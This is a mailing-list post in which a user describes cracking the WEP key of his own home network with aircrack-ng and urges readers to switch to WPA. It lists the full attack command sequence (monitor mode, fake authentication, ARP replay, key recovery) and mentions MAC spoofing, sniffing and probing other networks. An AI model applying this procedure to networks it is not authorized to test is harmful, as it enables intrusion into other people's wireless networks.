Listmates: I had dropped WPA-tkip protection for WEP so my son and daughter could access the internet with their Nintendo DS game console. After doing so, I decided to poke around a bit to see how easy it was to break WEP encryption. To my utter dismay -- it was simple. True to the claims, it takes less than 60 seconds. After poking around a bit with google, I found the aircrack-ng link: http://www.aircrack-ng.org/doku.php?id= After a quick svn checkout of the latest, an install of libpcap-devel and a: make SQLITE=true make SQLITE=true install I issued the normal scan command for my wireless network to get the needed information: Skyline Bab... 00:1c:df:e2:7c:95 6 54M 40:0 100 EPs WEP I then issued the few commands needed to see if I could find my WEP key. On three separate console windows, this was all it took: ## [Console 1 as root] ## Stop your wireless card and re-start the card in monitor mode: airmon-ng stop ath0 iwconfig # to confirm airmon-ng start wifi0 6 # 6 is the channel from above ## Test for working Wireless Device Packet Injection aireplay-ng -9 -e "Skyline Bab..." -a 00:1c:df:e2:7c:95 ath0 ## Start airodump-ng to capture the IVs (open another console) airodump-ng -c 6 --bssid 00:1c:df:e2:7c:95 -w output ath0 ## [Console 2 as root] ## Use aireplay-ng to do a fake authentication with the access point aireplay-ng -1 0 -e "Skyline Bab..." -a 00:1c:df:e2:7c:95 -h 00:1B:9E:7C:F6:E7 ath0 ## Start aireplay-ng in ARP request replay mode aireplay-ng -3 -b 00:1c:df:e2:7c:95 -h 00:1B:9E:7C:F6:E7 ath0 ## [Console 3 as root] ## Run aircrack-ng to decipher and obtain the WEP key aircrack-ng -z -b 00:1c:df:e2:7c:95 output*.cap Less than 15 seconds later (not real key): KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 ) Decrypted correctly: 100% Thankfully, my MAC filter prevented a connection, but can you say spoof of the old mac address. After a connection is made, a quick fire up of wireshark will quickly disclose the remaining DNS information, etc. needed to fully utilize your wireless. What was further baffling, after checking a few networks, I found 90% of all the WEP keys were still left as the default key of '12345'. If you are running WEP, it might be time to move your security to at lease WPA Personal if not to WPA+AEN/(RSN). Needless to say, my kids no longer have internet access for their Nintendo DS's. Good think the Playstation PSP will do WPA;-) -- David C. Rankin, J.D.,P.E. Rankin Law Firm, PLLC 510 Ochiltree Street Nacogdoches, Texas 75961 Telephone: (936) 715-9333 Facsimile: (936) 715-9339 www.rankinlawfirm.com -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org